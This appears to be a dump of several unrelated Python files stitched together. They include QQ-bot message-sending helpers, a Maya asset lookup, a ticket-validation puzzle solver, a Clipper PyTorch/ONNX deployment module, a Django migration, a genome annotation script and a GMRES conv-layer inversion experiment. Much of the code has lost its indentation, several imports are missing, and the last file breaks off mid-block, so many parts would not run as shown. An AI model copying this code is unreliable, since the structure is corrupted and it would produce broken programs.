from .model import FriendMsg, GroupMsg
from .utils import file_to_base64
def Text(text: str, at=False):
    """Send text
    :param text: the text content
    :param at: whether to @ (mention) the user who sent the message
    """
    text = str(text)
    # Look up the message context (the `ctx` variable) in the calling frame
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (GroupMsg, FriendMsg)):
ctx = v
break
if ctx is None:
        raise InvalidContextError("Only supported inside group-message and friend-message receiver functions")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
return action.sendGroupText(
ctx.FromGroupId, text, atUser=ctx.FromUserId if at else 0
)
if isinstance(ctx, FriendMsg):
        if ctx.TempUin:  # private (temporary session) message
return action.sendPrivateText(ctx.FromUin, ctx.TempUin, text)
        elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return action.sendPhoneText(text)
else:
return action.sendFriendText(ctx.FromUin, text)
return None
def Picture(pic_url="", pic_base64="", pic_path="", pic_md5="", text=""):
"""发送图片 经支持群消息和好友消息接收函数内调用
:param pic_url: 图片链接
:param pic_base64: 图片base64编码
:param pic_path: 图片文件路径
:param pic_md5: 已发送图片的MD5, 如果是发给群聊,可以传入图片MD5列表
:param text: 包含的文字消息
``pic_url, pic_base64, pic_path必须给定一项``
"""
assert any([pic_url, pic_base64, pic_path, pic_md5]), "必须给定一项"
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (FriendMsg, GroupMsg)):
ctx = v
break
if ctx is None:
        raise InvalidContextError("Only supported inside group-message and friend-message receiver functions")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
if pic_url:
return action.sendGroupPic(ctx.FromGroupId, content=text, picUrl=pic_url)
elif pic_base64:
return action.sendGroupPic(
ctx.FromGroupId, content=text, picBase64Buf=pic_base64
)
elif pic_path:
return action.sendGroupPic(
ctx.FromGroupId, content=text, picBase64Buf=file_to_base64(pic_path)
)
elif pic_md5:
return action.sendGroupPic(ctx.FromGroupId, content=text, picMd5s=pic_md5)
if isinstance(ctx, FriendMsg):
if pic_url:
if ctx.TempUin is not None:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, picUrl=pic_url
)
else:
return action.sendFriendPic(ctx.FromUin, picUrl=pic_url, content=text)
elif pic_base64:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, picBase64Buf=pic_base64
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendPic(
ctx.FromUin, picBase64Buf=pic_base64, content=text
)
elif pic_path:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin,
ctx.TempUin,
content=text,
picBase64Buf=file_to_base64(pic_path),
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendPic(
ctx.FromUin, picBase64Buf=file_to_base64(pic_path), content=text
)
elif pic_md5:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, fileMd5=pic_md5
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendPic(ctx.FromUin, fileMd5=pic_md5, content=text)
return None
def Voice(voice_url="", voice_base64="", voice_path=""):
"""发送语音 经支持群消息和好友消息接收函数内调用
:param voice_url: 语音链接
:param voice_base64: 语音base64编码
:param voice_path: 语音文件路径
voice_url, voice_base64, voice_path必须给定一项
"""
assert any([voice_url, voice_base64, voice_path]), "必须给定一项"
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (GroupMsg, FriendMsg)):
ctx = v
break
if ctx is None:
        raise InvalidContextError("Only supported inside group-message and friend-message receiver functions")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
if voice_url:
return action.sendGroupVoice(ctx.FromGroupId, voiceUrl=voice_url)
elif voice_base64:
return action.sendGroupVoice(ctx.FromGroupId, voiceBase64Buf=voice_base64)
elif voice_path:
return action.sendGroupVoice(
ctx.FromGroupId, voiceBase64Buf=file_to_base64(voice_path)
)
if isinstance(ctx, FriendMsg):
if voice_url:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceUrl=voice_url
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendVoice(ctx.FromUin, voiceUrl=voice_url)
elif voice_base64:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceBase64Buf=voice_base64
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendVoice(ctx.FromUin, voiceBase64Buf=voice_base64)
elif voice_path:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceBase64Buf=file_to_base64(voice_path)
)
            elif ctx.MsgType == MsgTypes.PhoneMsg:  # message sent from the user's phone
return None
else:
return action.sendFriendVoice(
ctx.FromUin, voiceBase64Buf=file_to_base64(voice_path)
)
return None
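# Illustration of the frame-inspection pattern used by Text, Picture and Voice
# above (an added sketch, not part of the original API): a helper can locate
# the `ctx` local variable of its caller via sys._getframe().
def _find_ctx_from_caller():
    """Return the caller's `ctx` local if it is a friend/group message, else None."""
    caller_locals = sys._getframe().f_back.f_locals
    ctx = caller_locals.get("ctx")
    if isinstance(ctx, (FriendMsg, GroupMsg)):
        return ctx
    return None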
|
python
|
# coding:utf-8
# --author-- binglu.wang
import zfused_api
import zfused_maya.core.record as record
def get_assets():
_assets = {}
_project_id = record.current_project_id()
_project_assets = zfused_api.asset.project_assets([_project_id])
for _asset in _project_assets:
asset = zfused_api.asset.Asset(_asset["Id"])
        _assets[asset.code()] = asset.production_path()
return _assets
|
python
|
INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
filetext = ifile.read()
data = filetext.strip().split("\n\n")
from typing import Tuple
IntervalPair = Tuple[int, int, int, int]
def parse_rule(line: str) -> Tuple[str, IntervalPair]:
field, right = line.split(": ")
a, b, c, d = (int(z) for p in right.split("or") for z in p.split("-"))
return field, (a, b, c, d)
def within(z: int, ip: IntervalPair) -> bool:
return ip[0] <= z <= ip[1] or ip[2] <= z <= ip[3]
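# Quick self-check (an added sketch): a value satisfies a rule if it falls in
# either of the rule's two closed intervals, e.g. "1-3 or 5-7".
assert within(3, (1, 3, 5, 7)) and within(5, (1, 3, 5, 7))
assert not within(4, (1, 3, 5, 7))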
rules = dict(map(parse_rule, data[0].split("\n")))
mine = list(map(int, data[1].split("\n")[1].split(",")))
nearby = [list(map(int, line.split(","))) for line in data[2].split("\n")[1:]]
print(sum(
value for ticket in nearby for value in ticket
if all(not within(value, ip) for ip in rules.values())
))
valids = [
ticket.copy() for ticket in nearby
if all(
any(within(value, ip) for ip in rules.values())
for value in ticket
)
]
field_to_indices = dict(
(field, set(
i for i in range(len(rules))
if all(within(ticket[i], ip) for ticket in valids)
))
for field, ip in rules.items()
)
solved = set()
while any(len(indices) > 1 for indices in field_to_indices.values()):
for indices in field_to_indices.values():
if len(indices) == 1:
solved.add(next(iter(indices)))
else:
indices -= solved
from collections import defaultdict
index_to_field = defaultdict(str, (
(next(iter(indices)) if indices else -1, field)
for field, indices in field_to_indices.items()
))
from math import prod
print(prod(
value for i, value in enumerate(mine)
if index_to_field[i].startswith("departure")
))
|
python
|
from __future__ import print_function, with_statement, absolute_import
import shutil
import torch
import logging
import os
from warnings import warn
from ..version import __version__
from .deployer_utils import save_python_function
logger = logging.getLogger(__name__)
def create_pytorch_endpoint(clipper_conn,
name,
input_type,
inputs,
func,
pytorch_model,
default_output="None",
version=1,
slo_micros=3000000,
labels=None,
registry=None,
base_image=None,
num_replicas=1,
onnx_backend="caffe2",
batch_size=-1,
pkgs_to_install=None):
"""This function deploys the prediction function with a PyTorch model.
It serializes the PyTorch model in Onnx format and creates a container that loads it as a
Caffe2 model.
Parameters
----------
clipper_conn : :py:meth:`clipper_admin.ClipperConnection`
A ``ClipperConnection`` object connected to a running Clipper cluster.
name : str
The name to be assigned to both the registered application and deployed model.
input_type : str
The input_type to be associated with the registered app and deployed model.
One of "integers", "floats", "doubles", "bytes", or "strings".
inputs :
input of func.
func : function
The prediction function. Any state associated with the function will be
captured via closure capture and pickled with Cloudpickle.
pytorch_model : pytorch model object
The PyTorch model to save.
default_output : str, optional
The default output for the application. The default output will be returned whenever
an application is unable to receive a response from a model within the specified
query latency SLO (service level objective). The reason the default output was returned
is always provided as part of the prediction response object. Defaults to "None".
version : str, optional
The version to assign this model. Versions must be unique on a per-model
basis, but may be re-used across different models.
slo_micros : int, optional
The query latency objective for the application in microseconds.
This is the processing latency between Clipper receiving a request
and sending a response. It does not account for network latencies
before a request is received or after a response is sent.
If Clipper cannot process a query within the latency objective,
the default output is returned. Therefore, it is recommended that
the SLO not be set aggressively low unless absolutely necessary.
100000 (100ms) is a good starting value, but the optimal latency objective
will vary depending on the application.
labels : list(str), optional
A list of strings annotating the model. These are ignored by Clipper
and used purely for user annotations.
registry : str, optional
The Docker container registry to push the freshly built model to. Note
        that if you are running Clipper on Kubernetes, this registry must be accessible
to the Kubernetes cluster in order to fetch the container from the registry.
base_image : str, optional
The base Docker image to build the new model image from. This
image should contain all code necessary to run a Clipper model
container RPC client.
num_replicas : int, optional
The number of replicas of the model to create. The number of replicas
for a model can be changed at any time with
:py:meth:`clipper.ClipperConnection.set_num_replicas`.
onnx_backend : str, optional
        The ONNX backend to use. Caffe2 is the only currently supported ONNX backend.
batch_size : int, optional
The user-defined query batch size for the model. Replicas of the model will attempt
to process at most `batch_size` queries simultaneously. They may process smaller
batches if `batch_size` queries are not immediately available.
If the default value of -1 is used, Clipper will adaptively calculate the batch size for
individual replicas of this model.
pkgs_to_install : list (of strings), optional
A list of the names of packages to install, using pip, in the container.
The names must be strings.
"""
clipper_conn.register_application(name, input_type, default_output,
slo_micros)
deploy_pytorch_model(clipper_conn, name, version, input_type, inputs, func,
pytorch_model, base_image, labels, registry,
num_replicas, onnx_backend, batch_size,
pkgs_to_install)
clipper_conn.link_model_to_app(name, name)
def deploy_pytorch_model(clipper_conn,
name,
version,
input_type,
inputs,
func,
pytorch_model,
base_image=None,
labels=None,
registry=None,
num_replicas=1,
onnx_backend="caffe2",
batch_size=-1,
pkgs_to_install=None):
"""This function deploys the prediction function with a PyTorch model.
It serializes the PyTorch model in Onnx format and creates a container that loads it as a
Caffe2 model.
Parameters
----------
clipper_conn : :py:meth:`clipper_admin.ClipperConnection`
A ``ClipperConnection`` object connected to a running Clipper cluster.
name : str
The name to be assigned to both the registered application and deployed model.
version : str
The version to assign this model. Versions must be unique on a per-model
basis, but may be re-used across different models.
input_type : str
The input_type to be associated with the registered app and deployed model.
One of "integers", "floats", "doubles", "bytes", or "strings".
    inputs :
        Example input(s) to ``pytorch_model``; these are used to trace the
        model during the ONNX export.
func : function
The prediction function. Any state associated with the function will be
captured via closure capture and pickled with Cloudpickle.
pytorch_model : pytorch model object
        The PyTorch model to save.
base_image : str, optional
The base Docker image to build the new model image from. This
image should contain all code necessary to run a Clipper model
container RPC client.
labels : list(str), optional
A list of strings annotating the model. These are ignored by Clipper
and used purely for user annotations.
registry : str, optional
The Docker container registry to push the freshly built model to. Note
        that if you are running Clipper on Kubernetes, this registry must be accessible
to the Kubernetes cluster in order to fetch the container from the registry.
num_replicas : int, optional
The number of replicas of the model to create. The number of replicas
for a model can be changed at any time with
:py:meth:`clipper.ClipperConnection.set_num_replicas`.
onnx_backend : str, optional
        The provided ONNX backend. Caffe2 is the only currently supported ONNX backend.
batch_size : int, optional
The user-defined query batch size for the model. Replicas of the model will attempt
to process at most `batch_size` queries simultaneously. They may process smaller
batches if `batch_size` queries are not immediately available.
If the default value of -1 is used, Clipper will adaptively calculate the batch size for
individual replicas of this model.
pkgs_to_install : list (of strings), optional
A list of the names of packages to install, using pip, in the container.
The names must be strings.
"""
warn("""
The caffe 2 version is not up to date because
https://github.com/ucbrise/clipper/issues/475,
however you may still be able use it.
We will update our caffe2 build soon.""")
if base_image is None:
        if onnx_backend == "caffe2":
base_image = "clipper/caffe2-onnx-container:{}".format(__version__)
else:
logger.error(
"{backend} ONNX backend is not currently supported.".format(
backend=onnx_backend))
serialization_dir = save_python_function(name, func)
try:
torch.onnx._export(
pytorch_model,
inputs,
os.path.join(serialization_dir, "model.onnx"),
export_params=True)
# Deploy model
clipper_conn.build_and_deploy_model(
name, version, input_type, serialization_dir, base_image, labels,
registry, num_replicas, batch_size, pkgs_to_install)
    except Exception as e:
        logger.error(
            "Error serializing PyTorch model to ONNX: {e}".format(e=e))
    else:
        logger.info("Torch model has been serialized to ONNX format")
# Remove temp files
shutil.rmtree(serialization_dir)
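

# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of how deploy_pytorch_model might be invoked.
# It assumes a Clipper cluster started locally with Docker via the public
# clipper_admin APIs; the model, application name, and predict function
# below are hypothetical.
if __name__ == "__main__":
    from clipper_admin import ClipperConnection, DockerContainerManager

    conn = ClipperConnection(DockerContainerManager())
    conn.connect()  # assumes a Clipper cluster is already running locally

    model = torch.nn.Linear(4, 2)      # toy PyTorch model
    sample_input = torch.randn(1, 4)   # traced during the ONNX export

    def predict(xs):
        # Hypothetical predict function: stringify each input.
        return [str(x) for x in xs]

    deploy_pytorch_model(conn, name="toy-app", version="1",
                         input_type="floats", inputs=sample_input,
                         func=predict, pytorch_model=model)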
|
python
|
# Generated by Django 3.1.5 on 2021-02-09 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DJIAIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=150, unique=True)),
('exchange', models.CharField(max_length=15)),
('symbol', models.CharField(max_length=10, unique=True)),
('industry', models.CharField(max_length=150)),
('date_added', models.DateTimeField()),
('notes', models.CharField(max_length=200, null=True)),
('weighting', models.CharField(max_length=20, null=True)),
],
options={
'verbose_name_plural': 'DJIA Market Index Composition',
},
),
migrations.CreateModel(
name='FTSE100IndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=150, unique=True)),
('symbol', models.CharField(max_length=10, unique=True)),
('industry', models.CharField(max_length=200)),
],
options={
'verbose_name_plural': 'FTSE 100 Market Index Composition',
},
),
migrations.CreateModel(
name='SMIComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rank', models.IntegerField()),
('company', models.CharField(max_length=100, unique=True)),
('industry', models.CharField(max_length=100)),
('symbol', models.CharField(max_length=10, unique=True)),
('canton', models.CharField(max_length=100)),
('weighting', models.CharField(max_length=20)),
],
options={
'verbose_name_plural': 'Swiss Market Index Composition',
},
),
migrations.CreateModel(
name='SPIComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=10, unique=True)),
('company', models.CharField(max_length=100)),
('smi_family', models.CharField(max_length=100, null=True)),
('date_added', models.CharField(max_length=10, null=True)),
('notes', models.CharField(max_length=200, null=True)),
],
options={
'verbose_name_plural': 'Swiss Performance Index Composition',
},
),
migrations.CreateModel(
name='SPTSXIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=20, unique=True)),
('company', models.CharField(max_length=200)),
('sector', models.CharField(max_length=100)),
('industry', models.CharField(max_length=200)),
],
options={
'verbose_name_plural': 'S&P/TSX Market Index Composition',
},
),
migrations.CreateModel(
name='SPYIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=10, unique=True)),
('security_name', models.CharField(max_length=100, unique=True)),
('gics_sector', models.CharField(max_length=100, null=True)),
('gics_sub_industry', models.CharField(max_length=100, null=True)),
('headquarters_location', models.CharField(max_length=100, null=True)),
('date_added', models.CharField(max_length=25, null=True)),
('cik', models.IntegerField(unique=True)),
('founded', models.CharField(max_length=50)),
],
options={
'verbose_name_plural': 'SPY Market Index Composition',
},
),
]
|
python
|
import glob
import os
from Bio import SeqIO
from Bio.Seq import Seq
output_dir_merge = '/scratch/users/anniz44/genomes/donor_species/vcf_round2/merge/details'
genus_cutoff = 3 # >= 3 genera as core
allgenome = output_dir_merge + '/summary/all.genome.gene.faa'
allgenome_denovo = output_dir_merge + '/summary/all.denovo.gene.faa'
allgenome_HS = output_dir_merge + '/summary/all.selected.gene.faa'
def genus_list(species_list):
return set([i.replace('BL','BiLo').replace('BA','BiAd')[0:2] for i in species_list])
def function_species(fastaname):
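    """Annotate eggNOG/KEGG cluster summaries with species counts.

    For each record in <fastaname>.uc.species.sum, record how many species
    carry the gene and whether those species span >= genus_cutoff genera
    ('cross_genus'), then append both columns to the eggNOG and KEGG summary
    tables, writing the results to *.species.sum output files.
    """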
species_file = fastaname + '.uc.species.sum'
eggnog_file = fastaname + '.cluster.aa.all.eggnog.sum'
kegg_file = fastaname + '.cluster.aa.all.kegg.sum'
Species_fun = dict()
for lines in open(species_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
record_name = line_set[0]
species_num = line_set[1]
species_name = line_set[2].split(',')
tag_genus = 'False'
if len(species_name) > 1:
genus = genus_list(species_name)
if len(genus) >= genus_cutoff:
tag_genus = 'True'
Species_fun.setdefault(record_name, [species_num,tag_genus])
Output = []
for lines in open(eggnog_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
if lines.startswith('cluster'):
Output.append('\t'.join(line_set) + '\tspecies_num\tcross_genus\n')
else:
if line_set[6] == '':
line_set.pop(6)
record_name = line_set[4]
if record_name in Species_fun:
species_num, tag_genus = Species_fun[record_name]
else:
species_num, tag_genus = [1,'False']
Output.append('\t'.join(line_set) + '\t%s\t%s\n'%(species_num, tag_genus))
f1 = open(fastaname + '.cluster.aa.all.eggnog.sum.species.sum', 'w')
f1.write(''.join(Output))
f1.close()
Output = []
for lines in open(kegg_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
if lines.startswith('cluster'):
Output.append('\t'.join(line_set) + '\tspecies_num\tcross_genus\n')
else:
if line_set[6] == '':
line_set.pop(6)
record_name = line_set[4]
if record_name in Species_fun:
species_num, tag_genus = Species_fun[record_name]
else:
species_num, tag_genus = [1,'False']
Output.append('\t'.join(line_set) + '\t%s\t%s\n'%(species_num, tag_genus))
f1 = open(fastaname + '.cluster.aa.all.kegg.sum.species.sum', 'w')
f1.write(''.join(Output))
f1.close()
function_species(allgenome_HS)
function_species(allgenome_denovo)
function_species(allgenome)
# split HS annotation within lineage and across lineages
def HS_lineage(filename,HS_lineagefasta):
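    """Split an annotation table by membership in the lineage FASTA.

    Lines whose 5th column (record id) matches a sequence id found in
    HS_lineagefasta go to <filename>.within.sum; all others go to
    <filename>.across.sum.
    """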
HS_lineage_set = set()
for record in SeqIO.parse(HS_lineagefasta, 'fasta'):
record_id = str(record.id)
HS_lineage_set.add(record_id)
Output_within = set()
Output_across = set()
for lines in open(filename,'r'):
if lines.split('\t')[4] in HS_lineage_set:
Output_within.add(lines)
else:
Output_across.add(lines)
f1 = open(filename + '.within.sum', 'w')
f1.write(''.join(list(Output_within)))
f1.close()
f1 = open(filename + '.across.sum', 'w')
f1.write(''.join(list(Output_across)))
f1.close()
#HS_annotation_sum = output_dir_merge + '/summary/all.selected.gene.faa.cluster.aa.all.eggnog.sum.species.sum'
#allgenome_HS_lineage = output_dir_merge + '/summary/all.selected.gene.faa'
#HS_lineage(HS_annotation_sum,allgenome_HS_lineage)
|
python
|
from __future__ import print_function
import numpy as np
from scipy.sparse.linalg import gmres
import scipy.sparse.linalg as spla
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import torch.backends.cudnn as cudnn
import os
import argparse
from tqdm import tqdm
class twoModule(nn.Module):
def __init__(self, KERNEL_SIZE=3, channels=3):
super(twoModule, self).__init__()
self.conv = nn.Conv2d(channels, channels, kernel_size=KERNEL_SIZE, stride=1, padding=int((KERNEL_SIZE-1)/2))
self.bn = nn.BatchNorm2d(channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
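# The two helpers below fold the BatchNorm affine transform into the
# preceding convolution (standard conv-BN fusion, using running statistics):
#   W_fused = diag(gamma / sqrt(running_var + eps)) @ W_conv
#   b_fused = beta + gamma * (b_conv - running_mean) / sqrt(running_var + eps)
# so that, in eval mode, conv+BN acts as a single affine map y = A x + B.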
def weight(Conv, Bn):
w_conv = Conv.weight.clone().view(Conv.out_channels, -1)
w_bn = torch.diag(Bn.weight.div(torch.sqrt(Bn.eps + Bn.running_var)))
w = torch.mm(w_bn, w_conv)
return w
def bias(Conv, Bn):
    if Conv.bias is not None:
        b_conv = Conv.bias
    else:
        b_conv = torch.zeros(Conv.weight.size(0))
    # Fused bias: beta + gamma * (b_conv - running_mean) / sqrt(eps + running_var);
    # note the conv bias must also be scaled by gamma / sqrt(eps + running_var).
    scale = Bn.weight.div(torch.sqrt(Bn.eps + Bn.running_var))
    b = Bn.bias + scale * (b_conv - Bn.running_mean)
    return b
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--num', '-n', default=16, type=int, help='number of input data')
parser.add_argument('--channels', '-c', default=3, type=int, help='number of channels of input data')
parser.add_argument('--height', '-hh', default=32, type=int, help='height of input data')
parser.add_argument('--width', '-w', default=32, type=int, help='width of input data')
parser.add_argument('--kernel', '-k', default=5, type=int, help='kernel size of the Conv layer')
parser.add_argument('--epoch', '-e', default=100, type=int, help='number of epochs for testing')
parser.add_argument('--batch', default=100, type=int, help='batch size for input data')
    # parser.add_argument('--epoch_num', '-e', default=1, type=int, help='number of epochs while training')
args = parser.parse_args()
torch.set_grad_enabled(False)
#Test module for randomly generated data
kernel = args.kernel
    padding = (kernel - 1) // 2  # integer padding so that input and output have the same dimensions
height = args.height
width = args.width
height_padding = height + padding * 2
width_padding = width + padding * 2
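    # In eval mode the conv+BN stack is a single affine map on the flattened,
    # zero-padded input: y = AA @ x + B with AA = A @ Padding. Recovering x
    # from y therefore reduces to the linear system AA @ x = y - B, which is
    # solved below with SciPy's GMRES and a simple row-max scaling preconditioner.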
    net = twoModule(args.kernel, args.channels)
    net.eval()  # use running BN statistics so the fused (W, B) matches net(x)
for i in range(args.epoch):
#Usual forward calculation for random generated data
x = torch.randn(args.num, args.channels, args.height, args.width)
y = net(x)
W = weight(net.conv, net.bn)
B = bias(net.conv, net.bn)
#Prepare A
A = torch.zeros(int(args.channels * height * width), int(args.channels * height_padding * width_padding))
if args.channels == 3:
w = W.clone().view(3, 3, kernel, kernel)
for i in range(3):
for j in range(height):
for k in range(width):
row_index = int(i * height * width + j * width + k)
for m in range(3):
for n in range(kernel):
for p in range(kernel):
                                    A[row_index][int(m * width_padding * height_padding + (j + n) * width_padding + (k + p))] = w[i][m][n][p]
elif args.channels == 1:
w = W.clone().view(kernel, -1)
for j in range(height):
for k in range(width):
row_index = int(j * width + k)
for n in range(kernel):
for p in range(kernel):
                            A[row_index][int((j + n) * width_padding + (k + p))] = w[n][p]
Padding = torch.zeros(int(args.channels * height_padding * width_padding), int(args.channels * height * width))
for m in range(args.channels):
for i in range(height):
for j in range(width):
                    Padding[int(m * width_padding * height_padding + (i + padding) * width_padding + (padding + j))][int(m * width * height + i * width + j)] = 1
AA = torch.mm(A, Padding)
#Prepare b
b = y.clone().view(-1)
for i in range(args.channels):
for j in range(height):
for k in range(width):
b[i * height * width + j * width + k] -= B[i]
if args.num != 1:
b = b.clone().view(args.num, -1)
#Solve Ax=b to solve the implicit problem
#Prepare the preconditioner
max_tensor = torch.zeros(int(args.channels * height * width))
for k in range(int(args.channels * height * width)):
if abs(torch.max(AA[k]).item()) == 0:
max_tensor[k] = 0
else:
max_tensor[k] = 1.0 / abs(torch.max(AA[k]).item())
D = torch.diag(max_tensor)
#Apply the GMRES method
X = torch.zeros(int(args.num * args.channels * height * width))
if args.num != 1:
for i in range(args.num):
z = gmres(AA.numpy(), b[i].numpy(), tol=1e-06, M=D.numpy())
for j in range(args.channels * height * width):
xx = torch.from_numpy(z[0])
X[i * args.channels * height * width + j] = xx[j]
else:
z = gmres(AA.numpy(), b.numpy(), tol=1e-06, M=D.numpy())
X = torch.from_numpy(z[0])
XX = X.clone().view(args.num, args.channels, height, width)
Y = net(XX)
d = (y - Y).norm(1).item()
dd = (y - Y).norm(2).item()
ddd = abs(torch.max(y - Y).item())
s = (y - Y).norm(1).div(y.norm(1)).item()
ss = (y - Y).norm(2).div(y.norm(2)).item()
sss = abs(torch.max(y - Y).item()) / abs(torch.max(y).item())
print("error_1: %.8f, error_2: %.8f, error_3: %.8f, error_4: %.8f, error_5: %.8f, error_6: %.8f"
% (d, dd, ddd, s, ss, sss))
with open(os.path.join('WANTED_PATH' + str(args.num) + '.txt'), 'a') as f: #you need to modify the code here to get it running
f.write(str(d))
f.write(' ')
f.write(str(dd))
f.write(' ')
f.write(str(ddd))
f.write(' ')
f.write(str(s))
f.write(' ')
f.write(str(ss))
f.write(' ')
f.write(str(sss))
f.write('\n')
################# not used ###################################################
'''
#Apply this method to solve the implicit case of CIFAR10
#preparing data from CIFAR10
print("==> preparing data...")
DOWNLOAD = False
if not (os.path.exists('./data/')) or not (os.listdir('./data/')):
DOWNLOAD = True
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=DOWNLOAD, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=DOWNLOAD, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=args.batch, shuffle=False, num_workers=2)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
kernel = args.kernel
padding = (kernel - 1) / 2 #ensure that input and output have the same dimensions
height = args.height
width = args.width
height_padding = height + padding * 2
width_padding = width + padding * 2
net = twoModule(args.kernel, args.channels)
net.to(device)
batch_idx = 0
for (inputs, targets) in tqdm(testloader):
batch_idx += 1
inputs, targets = inputs.to(device), targets.to(device)
outputs = net.forward(inputs)
W = weight(net.conv, net.bn)
B = bias(net.conv, net.bn)
A = torch.zeros(int(args.channels * height * width), int(args.channels * height_padding * width_padding))
if args.channels == 3:
w = W.clone().view(3, 3, kernel, kernel)
for i in range(3):
for j in range(height):
for k in range(width):
row_index = int(i * height * width + j * width + k)
for m in range(3):
for n in range(kernel):
for p in range(kernel):
                            A[row_index][int(m * width_padding * height_padding + (j + n) * width_padding + (k + p))] = \
                                w[i][m][n][p]
elif args.channels == 1:
w = W.clone().view(kernel, -1)
for j in range(height):
for k in range(width):
row_index = int(j * width + k)
for n in range(kernel):
for p in range(kernel):
                        A[row_index][int((j + n) * width_padding + (k + p))] = w[n][p]
Padding = torch.zeros(int(args.channels * height_padding * width_padding), int(args.channels * height * width))
for m in range(args.channels):
for i in range(height):
for j in range(width):
                Padding[int(m * width_padding * height_padding + (i + padding) * width_padding + (padding + j))][
                    int(m * width * height + i * width + j)] = 1
AA = torch.mm(A, Padding)
b = outputs.clone().view(-1)
for i in range(args.channels):
for j in range(height):
for k in range(width):
b[i * height * width + j * width + k] -= B[i]
if args.batch != 1:
b = b.clone().view(args.batch, -1)
#Solve Ax=b to solve the implicit problem
#Prepare the preconditioner
max_tensor = torch.zeros(int(args.channels * height * width))
for k in range(int(args.channels * height * width)):
if abs(torch.max(AA[k]).item()) == 0:
max_tensor[k] = 0
else:
max_tensor[k] = 1.0 / abs(torch.max(AA[k]).item())
D = torch.diag(max_tensor)
# Apply the GMRES method
X = torch.zeros(int(args.batch * args.channels * height * width))
if args.batch != 1:
for i in range(args.batch):
z = gmres(AA.cpu().numpy(), b[i].cpu().numpy(), tol=1e-06, M=D.cpu().numpy())
for j in range(args.channels * height * width):
xx = torch.from_numpy(z[0])
X[i * args.channels * height * width + j] = xx[j]
else:
z = gmres(AA.cpu().numpy(), b.cpu().numpy(), tol=1e-06, M=D.cpu().numpy())
X = torch.from_numpy(z[0])
#calculate the numerical error
XX = X.clone().view(args.batch, args.channels, height, width)
Y = net(XX)
d = (outputs - Y).norm(1).item()
dd = (outputs - Y).norm(2).item()
ddd = abs(torch.max(outputs - Y).item())
        s = (outputs - Y).norm(1).div(outputs.norm(1)).item()
